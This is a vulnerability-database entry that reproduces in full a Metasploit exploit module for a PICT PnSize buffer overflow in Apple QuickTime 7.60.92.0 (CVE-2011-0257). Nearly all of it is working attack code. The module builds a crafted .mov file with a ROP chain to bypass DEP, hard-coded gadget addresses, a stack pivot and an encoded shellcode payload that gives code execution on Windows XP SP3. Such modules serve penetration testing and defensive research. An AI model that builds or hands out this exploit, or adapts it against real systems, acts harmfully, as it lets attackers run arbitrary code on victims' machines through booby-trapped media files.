Apple QuickTime PICT PnSize Buffer Overflow

Published: 03 Sep 2011 21:17:58
Reported by: MC <[email protected]>, corelanc0d3r <[email protected]>
Type: metasploit
Source: www.rapid7.com

Apple QuickTime PICT PnSize Buffer Overflow exploit in a .mov file

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Apple QuickTime PICT PnSize Buffer Overflow',
      'Description'    => %q{
        This module exploits a vulnerability in Apple QuickTime Player 7.60.92.0.
        When opening a .mov file containing a specially crafted PnSize value, an attacker
        may be able to execute arbitrary code.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'MC',           # Original Metasploit Module
          'corelanc0d3r <peter.ve[at]corelan.be>', # Added DEP Bypass support
        ],
      'References'     =>
        [
          [ 'CVE', '2011-0257' ],
          [ 'OSVDB', '74687' ],
          [ 'EDB', '17777' ],
          [ 'BID', '49144' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
          'DisablePayloadHandler' => true
        },
      'Payload'        =>
        {
          'Space'          => 750,
          'BadChars'       => "",  # Memcpy: no bad characters apply
          'EncoderType'    => Msf::Encoder::Type::AlphanumUpper,
          'DisableNops'    => 'True',
          'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
          'EncoderOptions' =>
            {
              'BufferRegister' => 'ECX',
            },
        },
      'Platform' => 'win',
      'Targets'        =>
        [
          # QuickTime.qts 7.60.92.0 # ADD ESP,4D0 # RETN
          [ 'Windows XP SP3 with DEP bypass', { 'Ret' => 0x67202c75 } ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2011-08-08',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME',   [ false, 'The file name.',  'msf.mov' ]),
      ])
  end

  def exploit
    # !mona rop
    rop =
    [
      0x67e21084,  # POP ECX # RETN [QuickTimeMPEG4.qtx]
      0x67ed30c0,  # ptr to &VirtualAlloc() [IAT QuickTimeMPEG4Authoring.qtx]
      0x68994002,  # MOV EAX,DWORD PTR DS:[ECX] # RETN [QTOLibrary.dll]
      0x6696ca36,  # XCHG EAX,ESI # RETN [QuickTime.qts]
      0x66c78001,  # POP EBP # RETN [QuickTime.qts]
      0x67eb8573,  # & call esp [QuickTimeMPEG4Authoring.qtx]
      0x67208003,  # POP EBX # RETN [QuickTime.qts]
      0x00000001,  # 0x00000001-> ebx
      0x6783ee02,  # POP EDX # RETN [QuickTimeInternetExtras.qtx]
      0x00001000,  # 0x00001000-> edx
      0x67e21084,  # POP ECX # RETN [QuickTimeMPEG4.qtx]
      0x00000040,  # 0x00000040-> ecx
      0x6762a008,  # POP EDI # RETN [QuickTimeVR.qtx]
      0x66a78005,  # RETN (ROP NOP) [QuickTime.qts]
      0x685a9802,  # POP EAX # RETN [QuickTimeAudioSupport.qtx]
      0x90909090,  # nop
      0x682f0001,  # PUSHAD # RETN [QuickTimeH264.qtx]
    ].pack('V*')

    # Stack pivot: ADD ESP,4D0 # RETN gadget (little-endian, like the ROP chain)
    stackpivot = [target.ret].pack('V')

    buffer = rand_text_alpha_upper(2)
    buffer << rop
    buffer << payload.encoded

    junk = rand_text_alpha_upper(2306 - buffer.length)

    buffer << junk
    buffer << stackpivot
    buffer << rand_text_alpha_upper(3000)

    # Load the template .mov shipped with the framework and append the crafted buffer
    path = File.join(Msf::Config.data_directory, "exploits", "CVE-2011-0257.mov")
    sploit = File.binread(path)

    sploit << buffer

    file_create(sploit)
  end
end
__END__
http://mirrors.apple2.org.za/apple.cabi.net/Graphics/PICT.and_QT.INFO/PICT.file.format.TI.txt

Opcode   Name                       Description                  Data Size (in bytes)

$0007    PnSize                     pen size (point)             4


Last updated: 02 Oct 2020 20:00
Scores: Vulners AI Score 0.7 (Low risk), CVSS 2 9.3, EPSS 0.60106